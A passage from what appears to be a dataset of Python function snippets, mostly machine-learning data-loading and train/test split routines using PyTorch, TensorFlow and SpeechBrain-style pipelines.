num_workers=config.num_workers, shuffle=True, pin_memory=True, drop_last=True)\n\n test_loader = data.DataLoader(dataset=test_set, batch_size=config.batch_size, num_workers=config.num_workers,\n shuffle=False, pin_memory=True, drop_last=False)\n\n return {'source_loader': source_loader, 'target_loader': target_loader, 'test_loader': test_loader}", "def creates_data_loader():\n dataset_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=True)\n\n dataset_no_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=False)\n\n datasets_faces_split = train_val_test(dataset_faces, 0.2, 0.0)\n datasets_no_faces_split = train_val_test(dataset_no_faces, 0.2, 0.0)\n\n datasets = {}\n datasets[\"train\"] = datasets_faces_split[\"train\"] + \\\n datasets_no_faces_split[\"train\"]\n datasets[\"test\"] = datasets_no_faces_split[\"test\"]\n datasets[\"val\"] = datasets_faces_split[\"val\"] + \\\n datasets_no_faces_split[\"val\"]\n\n train_loader = DataLoader(dataset=datasets[\"train\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n\n val_loader = DataLoader(dataset=datasets[\"val\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n return train_loader, val_loader", "def create_loader(self):\n # load data to memory.\n if self.is_cifar100:\n (x_train, y_train), (x_test,\n y_test) = tf.keras.datasets.cifar100.load_data()\n else:\n (x_train, y_train), (x_test,\n y_test) = tf.keras.datasets.cifar10.load_data()\n\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n x_train, y_train = shuffle_dataset(x_train, y_train)\n n_probe = int(math.floor(x_train.shape[0] * FLAGS.probe_dataset_hold_ratio))\n\n # TODO(zizhaoz): add other noise types.\n if 'asymmetric' in self.dataset_name:\n assert 'cifar100' not in self.dataset_name, 'Asymmetric only has CIFAR10'\n (x_train, y_train, y_gold), (x_probe, y_probe) = load_asymmetric(\n x_train,\n y_train,\n noise_ratio=self.noise_ratio,\n n_val=n_probe,\n random_seed=FLAGS.seed)\n elif 'uniform' in self.dataset_name:\n (x_train, y_train, y_gold), (x_probe,\n y_probe) = load_train_val_uniform_noise(\n x_train,\n y_train,\n n_classes=self.num_classes,\n noise_ratio=self.noise_ratio,\n n_val=n_probe)\n else:\n assert self.dataset_name in ['cifar10', 'cifar100']\n\n if not self.split_probe and x_probe is not None:\n # Usually used for supervised comparison.\n tf.logging.info('Merge train and probe')\n x_train = np.concatenate([x_train, x_probe], axis=0)\n y_train = np.concatenate([y_train, y_probe], axis=0)\n y_gold = np.concatenate([y_gold, y_probe], axis=0)\n\n conf_mat = sklearn_metrics.confusion_matrix(y_gold, y_train)\n conf_mat = conf_mat / np.sum(conf_mat, axis=1, keepdims=True)\n tf.logging.info('Corrupted confusion matirx\\n {}'.format(conf_mat))\n x_test, y_test = shuffle_dataset(x_test, y_test)\n self.train_dataset_size = x_train.shape[0]\n self.val_dataset_size = x_test.shape[0]\n if self.split_probe:\n self.probe_size = x_probe.shape[0]\n\n input_tuple = (x_train, y_train.squeeze())\n self.train_dataflow = self.create_ds(input_tuple, is_train=True)\n self.val_dataflow = self.create_ds((x_test, y_test.squeeze()),\n is_train=False)\n if self.split_probe:\n self.probe_dataflow = self.create_ds((x_probe, y_probe.squeeze()),\n is_train=True)\n\n tf.logging.info('Init [{}] dataset loader'.format(self.dataset_name))\n verbose_data('train', x_train, y_train)\n verbose_data('test', x_test, y_test)\n if self.split_probe:\n verbose_data('probe', x_probe, y_probe)\n\n return self", "def _preload_all_samples(self):\n if self.mode in ['train_noval', 'train_with_val']:\n\n self._images_train, self._labels_train = [], []\n desc = \"Loading train image pairs & flows\"\n with tqdm(total=len(self._img_trn_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_trn_path):\n pbar.update(1)\n label_path = self._lbl_trn_path[n]\n image, label = self._load_sample(image_path, label_path)\n self._labels_train.append(label)\n self._images_train.append(image)\n\n if self.mode == 'train_with_val':\n self._images_val, self._labels_val = [], []\n desc = \"Loading val image pairs & flows\"\n with tqdm(total=len(self._img_val_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_val_path):\n pbar.update(1)\n label_path = self._lbl_val_path[n]\n image, label = self._load_sample(image_path, label_path, preprocess=False)\n self._labels_val.append(label)\n self._images_val.append(image)\n\n if self.opts['tb_test_imgs'] is True:\n self._images_test = []\n desc = \"Loading test samples\"\n with tqdm(total=len(self._img_tst_path), desc=desc, ascii=True, ncols=100) as pbar:\n for image_path in self._img_tst_path:\n pbar.update(1)\n self._images_test.append(self._load_sample(image_path, preprocess=False))\n\n elif self.mode in ['val', 'val_notrain']:\n\n self._images_val, self._labels_val = [], []\n desc = \"Loading val image pairs & flows\"\n with tqdm(total=len(self._img_val_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_val_path):\n pbar.update(1)\n label_path = self._lbl_val_path[n]\n image, label = self._load_sample(image_path, label_path, preprocess=False)\n self._labels_val.append(label)\n self._images_val.append(image)\n\n elif self.mode == 'test':\n self._images_test = []\n desc = \"Loading test samples\"\n with tqdm(total=len(self._img_tst_path), desc=desc, ascii=True, ncols=100) as pbar:\n for image_path in self._img_tst_path:\n pbar.update(1)\n self._images_test.append(self._load_sample(image_path, preprocess=False))", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' % (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def _init_al_dataset(self):\n\n self._init_dataset()\n\n train_dataset = self.datasets['train']\n\n dataset_size = len(train_dataset)\n self.budget = math.ceil(self.budget_frac*dataset_size)\n Sampler.__init__(self, config, self.budget) # TODO: Weird place to initialise this\n\n all_indices = set(np.arange(dataset_size))\n k_initial = math.ceil(len(all_indices)*self.initial_budget_frac)\n initial_indices = random.sample(list(all_indices), k=k_initial)\n\n sampler_init = data.sampler.SubsetRandomSampler(initial_indices) # need to sample from training dataset\n\n self.labelled_dataloader = data.DataLoader(train_dataset, sampler=sampler_init, batch_size=self.batch_size, drop_last=True)\n self.val_dataloader = data.DataLoader(self.datasets['valid'], batch_size=self.batch_size, drop_last=False)\n self.test_dataloader = data.DataLoader(self.datasets['test'], batch_size=self.batch_size, drop_last=False)\n\n return all_indices, initial_indices", "def __init__(self, file_paths_list, batch_size=1, patient_shape=(128, 128, 128), shuffle=True,\n mode_name='training_model', trans=[128]):\n # Set file_loader specific attributes\n self.rois = dict(oars=['Brainstem', 'SpinalCord', 'RightParotid', 'LeftParotid',\n 'Esophagus', 'Larynx', 'Mandible'], targets=['PTV56', 'PTV63', 'PTV70'])\n\n #self.batch_size = batch_size # Number of patients to load in a single batch\n self.patient_shape = patient_shape # Shape of the patient\n self.indices = np.arange(len(file_paths_list)) # Indices of file paths\n self.file_paths_list = file_paths_list # List of file paths\n self.shuffle = shuffle # Indicator as to whether or not data is shuffled\n self.full_roi_list = sum(map(list, self.rois.values()), []) # make a list of all rois\n self.num_rois = len(self.full_roi_list)\n self.patient_id_list = ['pt_{}'.format(k.split('/pt_')[1].split('/')[0].split('.csv')[0]) for k in\n self.file_paths_list] # the list of patient ids with information in this data loader\n self.trans = trans\n # Set files to be loaded\n self.required_files = None\n # self.aff_trans = MyRandomTransform()#transformation()\n self.mode_name = mode_name # Defines the mode for which data must be loaded for\n self.set_mode(self.mode_name) # Set load mode to prediction by default\n \n self.ct_scaling_factor = 4000. #Added by Ramsy\n self.dose_scaling_factor = 100. #Added by Ramsy", "def _generate_and_load_initial_batch(self, working_directory: Path):\n\n template_dir = Path(working_directory) / \"template_1\"\n template_dir.mkdir()\n # changes here should often be reflected in\n # data_generator_opts and data_loader_opts\n\n channel_decl = self.channel_configs[0]\n\n plugin_options = {\n \"pid\": \"0\",\n \"big_ids\": \"True\",\n }\n # if it's efficient to do the whole load in one go, let's just do that.\n if self.run_until.gap < MIN_PORTION_SIZE:\n num_records = self.run_until.gap\n else:\n num_records = 1 # smallest possible batch to get to parallelizing fast\n results = self._generate_and_load_batch(\n template_dir,\n channel_decl.org_config,\n {\n \"generator_yaml\": self.options.get(\"recipe\"),\n \"num_records\": num_records,\n \"num_records_tablename\": self.run_until.sobject_name or COUNT_REPS,\n \"loading_rules\": self.loading_rules,\n \"vars\": channel_decl.merge_recipe_options(self.recipe_options),\n \"plugin_options\": plugin_options,\n \"bulk_mode\": self.bulk_mode,\n },\n )\n self.update_running_totals_from_load_step_results(results)\n\n # rename directory to reflect real number of sets created.\n wd = SnowfakeryWorkingDirectory(template_dir)\n if self.run_until.sobject_name:\n self.sets_finished_while_generating_template = wd.get_record_counts()[\n self.run_until.sobject_name\n ]\n else:\n self.sets_finished_while_generating_template = num_records\n\n new_template_dir = data_loader_new_directory_name(template_dir, self.run_until)\n shutil.move(template_dir, new_template_dir)\n template_dir = new_template_dir\n\n # don't send data tables to child processes. All they\n # care about are ID->OID mappings\n wd = SnowfakeryWorkingDirectory(template_dir)\n self._cleanup_object_tables(*wd.setup_engine())\n\n return template_dir, wd.relevant_sobjects()", "def prepare_data_for_training(args):\n # Form the train/test splits and write them to disk\n dataset = data.Dataset(args)\n # get image classes and image counts in each class\n label_map = dataset.get_class_info()\n class_count = len(list(label_map.values()))\n # split the data and store it in log dir\n df_train, df_test = dataset.split_dataset()\n\n # perform dataset augmentations\n image_data = augment.Augmentation(args)\n # get the data gens for training and test images\n train_data_gen, _ = image_data.map_fn_train(df_train)\n test_data_gen, _ = image_data.map_fn_test(df_test)\n\n return train_data_gen, test_data_gen, df_train, df_test, class_count", "def make_dataloaders(params):\r\n transform_train = transforms.Compose([transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465],\r\n [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor()])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root=params['path'], train=True, transform=transform_train)\r\n testset = torchvision.datasets.CIFAR10(root=params['path'], train=False, transform=transform_validation)\r\n\r\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=params['batch_size'], shuffle=True, num_workers=4)\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=params['batch_size'], shuffle=False, num_workers=4)\r\n return trainloader, testloader", "def load_dataloaders(args):\n logger.info(\"Loading dataloaders...\")\n p_path = os.path.join(\"./data/\", \"df_unencoded.pkl\")\n train_path = os.path.join(\"./data/\", \"df_encoded.pkl\")\n if (not os.path.isfile(p_path)) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=False)\n elif os.path.isfile(p_path) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=True)\n elif os.path.isfile(train_path):\n df = load_pickle(\"df_encoded.pkl\")\n \n # Train-Test split\n msk = np.random.rand(len(df)) < args.train_test_ratio\n trainset = df[msk]\n testset = df[~msk]\n \n trainset = text_dataset(trainset, args)\n max_features_length = trainset.max_x_len\n max_seq_len = trainset.max_y_len\n train_length = len(trainset)\n train_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n \n testset = text_dataset(testset, args)\n test_length = len(testset)\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n return train_loader, train_length, max_features_length, max_seq_len, test_loader, test_length", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def create_split_loaders(root_dir, batch_size, seed=0, transform=transforms.ToTensor(),\n p_val=0.1, p_test=0.2, shuffle=True, \n show_sample=False, extras={}):\n \n\n # once all single json datasets are created you can concat them into a single one:\n quickdraw_dataset = CharacterDataset(root_dir=root_dir, transform=transform)\n \n # Dimensions and indices of training set\n dataset_size = len(quickdraw_dataset)\n all_indices = list(range(dataset_size))\n\n # Shuffle dataset before dividing into training & test sets\n if shuffle:\n np.random.seed(seed)\n np.random.shuffle(all_indices)\n \n # Create the validation split from the full dataset\n val_split = int(np.floor(p_val * dataset_size))\n train_ind, val_ind = all_indices[val_split :], all_indices[: val_split]\n \n # Separate a test split from the training dataset\n test_split = int(np.floor(p_test * len(train_ind)))\n train_ind, test_ind = train_ind[test_split :], train_ind[: test_split]\n print(len(train_ind), len(val_ind), len(test_ind))\n # Use the SubsetRandomSampler as the iterator for each subset\n sample_train = SubsetRandomSampler(train_ind)\n sample_test = SubsetRandomSampler(test_ind)\n sample_val = SubsetRandomSampler(val_ind)\n\n num_workers = 0\n pin_memory = False\n # If CUDA is available\n if extras:\n num_workers = extras[\"num_workers\"]\n pin_memory = extras[\"pin_memory\"]\n \n # Define the training, test, & validation DataLoaders\n train_loader = DataLoader(quickdraw_dataset, batch_size=batch_size, \n sampler=sample_train, num_workers=num_workers, \n pin_memory=pin_memory)\n\n test_loader = DataLoader(quickdraw_dataset, batch_size=batch_size, \n sampler=sample_test, num_workers=num_workers, \n pin_memory=pin_memory)\n\n val_loader = DataLoader(quickdraw_dataset, batch_size=batch_size,\n sampler=sample_val, num_workers=num_workers, \n pin_memory=pin_memory)\n\n \n # Return the training, validation, test DataLoader objects\n return (train_loader, val_loader, test_loader)", "def _load_data(self):\n self.mapper = Mapper()\n self.mapper.generate_vocabulary(self.review_summary_file)\n self.X_fwd, self.X_bwd, self.Y = self.mapper.get_tensor(reverseflag=True)\n # Store all the mapper values in a dict for later recovery\n self.mapper_dict = dict()\n self.mapper_dict['seq_length'] = self.mapper.get_seq_length()\n self.mapper_dict['vocab_size'] = self.mapper.get_vocabulary_size()\n self.mapper_dict['rev_map'] = self.mapper.get_reverse_map()\n # Split into test and train data\n self._split_train_tst()", "def __init__(self, \n fname_templates,\n fname_spike_train,\n reader,\n fname_out,\n dtype_out):\n #self.logger = logging.getLogger(__name__)\n\n # keep templates and spike train filname\n # will be loaded during each prallel process\n self.fname_templates = fname_templates\n self.fname_spike_train = fname_spike_train\n\n self.reader = reader\n\n # save output name and dtype\n self.fname_out = fname_out\n self.dtype_out = dtype_out", "def prepare_data(self):\n try:\n self.train_dataset = self.datasets['train']\n self.val_dataset = self.datasets['val']\n try:\n self.test_dataset = self.datasets['test']\n except:\n pass\n except Exception as e:\n print('Data was not succesfully prepared:', e)", "def initialise_dataset_loader(\n self, data_param=None, task_param=None, data_partitioner=None):\n raise NotImplementedError", "def get_dataloaders(args):\n if args.dataset == 'heat':\n dataset_class = heat.HeatDiffusionDataset\n else:\n raise ValueError(f'Unknown dataset {args.dataset}')\n train_dataset = dataset_class(\n dataset_class.get_train_path(args.data_path), args, train=True)\n if args.dist:\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset)\n else:\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, num_workers=args.workers,\n sampler=train_sampler, pin_memory=True, drop_last=args.drop_last)\n if not args.no_eval:\n validation_dataset = dataset_class(\n dataset_class.get_validation_path(args.data_path), args, train=False)\n if args.dist:\n validation_sampler = torch.utils.data.distributed.DistributedSampler(\n validation_dataset, shuffle=False)\n else:\n validation_sampler = torch.utils.data.SequentialSampler(\n validation_dataset)\n validation_loader = torch.utils.data.DataLoader(\n validation_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=validation_sampler,\n pin_memory=True, drop_last=args.drop_last)\n\n test_dataset = dataset_class(\n dataset_class.get_test_path(args.data_path), args, train=False)\n if args.dist:\n test_sampler = torch.utils.data.distributed.DistributedSampler(\n test_dataset, shuffle=False)\n else:\n test_sampler = torch.utils.data.SequentialSampler(\n test_dataset)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=test_sampler,\n pin_memory=True, drop_last=args.drop_last)\n else:\n validation_loader = None\n test_loader = None\n\n # Update the data shape if needed.\n if args.data_shape is None:\n args.data_shape = train_dataset.get_shape()\n if args.data_target_shape is None:\n args.data_target_shape = train_dataset.get_target_shape()\n\n return train_loader, validation_loader, test_loader", "def dataio_prepare(hparams):\n data_folder = hparams[\"data_folder\"]\n\n train_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"train_data\"],\n replacements={\"data_root\": data_folder}, )\n\n if hparams[\"sorting\"] == \"ascending\":\n # we sort training data to speed up training and get better results.\n train_data = train_data.filtered_sorted(sort_key=\"duration\")\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"descending\":\n train_data = train_data.filtered_sorted(\n sort_key=\"duration\", reverse=True)\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"random\":\n pass\n\n else:\n raise NotImplementedError(\n \"sorting must be random, ascending or descending\")\n\n valid_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"valid_data\"],\n replacements={\"data_root\": data_folder}, )\n valid_data = valid_data.filtered_sorted(sort_key=\"duration\")\n\n test_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"test_data\"],\n replacements={\"data_root\": data_folder}, )\n test_data = test_data.filtered_sorted(sort_key=\"duration\")\n\n datasets = [train_data, valid_data, test_data]\n\n # Defining tokenizer and loading it\n tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-chinese')\n\n # 2. Define audio pipeline:\n @data_pipeline.takes(\"wav\")\n @data_pipeline.provides(\"sig\")\n def audio_pipeline(wav):\n sig = dataio.read_audio(wav)\n return sig\n\n dataset.add_dynamic_item(datasets, audio_pipeline)\n\n # 3. Define text pipeline:\n @data_pipeline.takes(\"transcript\")\n @data_pipeline.provides(\"wrd\", \"tokens_list\", \"tokens\")\n def text_pipeline(wrd):\n wrd = \"\".join(wrd.split(\" \"))\n yield wrd\n tokens_list = tokenizer(wrd)[\"input_ids\"]\n yield tokens_list\n tokens = numpy.array(tokens_list, dtype=\"int64\")\n yield tokens\n\n dataset.add_dynamic_item(datasets, text_pipeline)\n\n # 4. Set output:\n dataset.set_output_keys(\n datasets,\n [\"id\", \"sig\", \"wrd\", \"tokens\"], )\n\n # 5. If Dynamic Batching is used, we instantiate the needed samplers.\n train_batch_sampler = None\n valid_batch_sampler = None\n if hparams[\"dynamic_batching\"]:\n from sampler import DynamicBatchSampler # noqa\n\n dynamic_hparams = hparams[\"dynamic_batch_sampler\"]\n num_buckets = dynamic_hparams[\"num_buckets\"]\n\n train_batch_sampler = DynamicBatchSampler(\n train_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n valid_batch_sampler = DynamicBatchSampler(\n valid_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n return (train_data, valid_data, test_data, tokenizer, train_batch_sampler,\n valid_batch_sampler, )", "def init_data(dataset_config: dict):\n # train and dev will be in random order, test may be ordered according to labels\n if dataset_config[\"name\"] == \"CoLA\":\n train, dev, test, num_classes = load_cola(dataset_config)\n elif dataset_config[\"name\"] == \"AGNews\":\n train, dev, test, num_classes = load_ag_news(dataset_config)\n elif dataset_config[\"name\"] == \"DBPedia\":\n train, dev, test, num_classes = load_dbpedia(dataset_config)\n elif dataset_config[\"name\"] == \"YRF\":\n train, dev, test, num_classes = load_yrf(dataset_config)\n else:\n raise NameError(f\"Dataset {dataset_config['name']} not implemented.\")\n # etc.\n\n # shrink size if debugging\n if dataset_config[\"debug\"]:\n # choose a random subset using huggingface select function\n train = train.select(random.sample(range(len(train)), k=200))\n dev = dev.select(random.sample(range(len(dev)), k=40))\n test = test.select(random.sample(range(len(test)), k=200))\n\n # create class imbalance\n random.seed(dataset_config[\"seed\"])\n if dataset_config[\"pool_balance\"] == \"balanced\":\n pass\n elif dataset_config[\"pool_balance\"] == \"imbalanced\":\n train = train.filter(lambda example: create_imbalanced_dataset(example, dataset_config[\"imbalance_prop\"], dataset_config['imbalance_cls']))\n else:\n NameError(f\"pool_balance = {dataset_config['pool_balance']} not allowed\")\n\n if dataset_config[\"dev_balance\"] == \"balanced\":\n pass\n elif dataset_config[\"dev_balance\"] == \"imbalanced\":\n dev = dev.filter(lambda example: create_imbalanced_dataset(example, dataset_config[\"imbalance_prop\"], dataset_config['imbalance_cls']))\n else:\n NameError(f\"dev_balance = {dataset_config['dev_balance']} not allowed\")\n\n # get seed labelled pool indices (using the same seed data every time)\n random.seed(dataset_config[\"seed\"])\n if dataset_config[\"seed_balance\"] == \"balanced\":\n # this is random (will have some variance vs pool)\n indices = list(range(len(train)))\n unlabelled_pool_idx, labelled_pool_idx = split(\n indices,\n random_state=dataset_config[\"seed\"],\n test_size=dataset_config[\"seed_size\"]\n )\n elif dataset_config[\"seed_balance\"] == \"stratified\":\n # this is the same as the underlying train set (which may be unbalanced)\n indices = list(range(len(train)))\n unlabelled_pool_idx, labelled_pool_idx = split(\n indices,\n random_state=dataset_config[\"seed\"],\n test_size=dataset_config[\"seed_size\"],\n stratify=train['label']\n )\n elif dataset_config[\"seed_balance\"] == \"imbalanced\":\n # artificially sample an imbalanced seed set from the pool\n unlabelled_pool_idx, labelled_pool_idx = create_imbalanced_seed(\n train,\n num_classes,\n dataset_config[\"seed_size\"],\n dataset_config['imbalance_prop'],\n dataset_config['imbalance_cls']\n )\n else:\n raise NameError(f\"seed_balance = {dataset_config['seed_balance']} not allowed\")\n\n return train, dev, test, num_classes, labelled_pool_idx, unlabelled_pool_idx", "def InitDataset(self):\n train_txt = 'ImageSets/Main/train.txt'\n val_txt = 'ImageSets/Main/val.txt'\n annotations = \"Annotations\"\n jpegimages = \"JPEGImages\"\n images_path = train_txt if (self.is_train) else val_txt \n images_path = readTxt(os.path.join(self.path, images_path))\n images_path.pop(-1)\n # rawdata format: [path_2_image, path_2_xml]\n rawData = list()\n for each in images_path:\n xml = os.path.join(self.path, annotations, each + '.xml')\n jpeg = os.path.join(self.path, jpegimages, each + '.jpg')\n rawData.append([jpeg, xml])\n return rawData", "def test_init(self, epochs):\n i = -1\n for p in self.P:\n for subband in self.SUBBANDS:\n i += 1\n\n # --- load model ----\n pref = self.model_dir + \"/\" + self.name % (subband, p)\n model = copy.deepcopy(self.model)\n model.model.load_weights(pref + \"_epochs_%d\" % epochs[i])\n self.NET.append(model)\n # --- end load model ----\n\n # --- load permutation ----\n self.permutation.append(\n np.load(self.model_dir + \"/permutation_\" + self.name %\n (subband, p) + \".npy\"))\n # --- end load permutation ----", "def reInitAndRun(self):\n self.playlists = self.readPlaylistData()\n self.audioDF = self.readAudioData(shouldProcess=True)\n self.clusterLabels = []\n self.models = Clusterers(k=len(self.playlists))\n self.processAndCluster()\n self.analyzeResults()", "def setup(self):\n # TODO check if need both dataset together\n self.train_dataset = ABSADataset(data_path=self.train_path, mode=self.in_mode, task=self.task, \n tokenizer=self.tokenizer, vocab=\"bert\")\n self.vocabulary = self.train_dataset.vocabulary\n\n self.eval_dataset = ABSADataset(data_path=self.dev_path, mode=self.in_mode, task=self.task,\n tokenizer=self.tokenizer, vocab=self.vocabulary)\n #self.train_restaurant = ABSADataset(data_path=RESTAURANT_TRAIN)\n #self.eval_restaurant = ABSADataset(data_path=RESTAURANT_DEV)", "def prepare_data_loaders_without_shuffle(batch_size=32, hier=False, elmo=False, elmo_pre=None, use_elmo_pre=False, deepmoji=False, dev_with_label=False, include_test=False):\n train_data_loaders = []\n val_data_loaders = []\n test_data_loaders = []\n\n vocab = generate_vocab(deepmoji)\n train, val, test, _ = prepare_data(batch_size=batch_size, hier=hier, elmo=elmo, elmo_pre=elmo_pre, use_elmo_pre=use_elmo_pre, deepmoji=deepmoji, is_shuffle=False, vocab=vocab, dev_with_label=dev_with_label, include_test=include_test)\n\n return train, val, test, vocab", "def prepare_data_loaders(num_split, batch_size=32, hier=False, elmo=False, elmo_pre=None, use_elmo_pre=False, deepmoji=False, dev_with_label=False, include_test=False):\n train_data_loaders = []\n val_data_loaders = []\n test_data_loaders = []\n\n vocab = generate_vocab(deepmoji)\n for i in range(num_split):\n train, val, test, _ = prepare_data(batch_size=batch_size, hier=hier, elmo=elmo, elmo_pre=elmo_pre, use_elmo_pre=use_elmo_pre, deepmoji=deepmoji, is_shuffle=True, random_state=i, vocab=vocab, dev_with_label=dev_with_label, include_test=include_test)\n train_data_loaders.append(train)\n val_data_loaders.append(val)\n test_data_loaders.append(test)\n\n return train_data_loaders, val_data_loaders, test_data_loaders, vocab", "def prepare_data(self, *args, **kwargs):\n # get paths to train and test splits\n _split_paths = [os.path.join(self.path_to_data, split)\n for split in os.listdir(self.path_to_data)]\n\n # for each split [train, test]\n for _path in _split_paths:\n _img_classes = os.listdir(_path) # get subfolders representing each class\n self.splits[os.path.basename(_path)] = []\n\n # get the images in pairs with its corresponding class\n for _class in _img_classes:\n _data = self.get_img_text_pair(os.path.join(_path, _class))\n\n if os.path.basename(_path) == 'train':\n self.weights[self.encode_label(_class)] = len(_data)\n self.splits[os.path.basename(_path)].extend(_data)", "def prepare_data(self):\n # Set up the path\n self.path_target_train = os.path.join(self.data_dir, self.train_path_file_target + \".pkl\")\n self.path_target_test = os.path.join(self.data_dir, self.test_path_file_target + \".pkl\")\n\n if not os.path.exists(self.path_target_train) or not os.path.exists(self.path_target_test):\n # Create vocabularies of the appropriate sizes.\n self.create_vocabulary(self.train_path_file)\n\n # Create token ids for the training data.\n input_train_path = self.train_path_file\n target_train_path = self.train_path_file_target\n train_input, train_input_length, train_labels = self.data_to_token_ids(input_train_path, target_train_path)\n\n # Create token ids for the 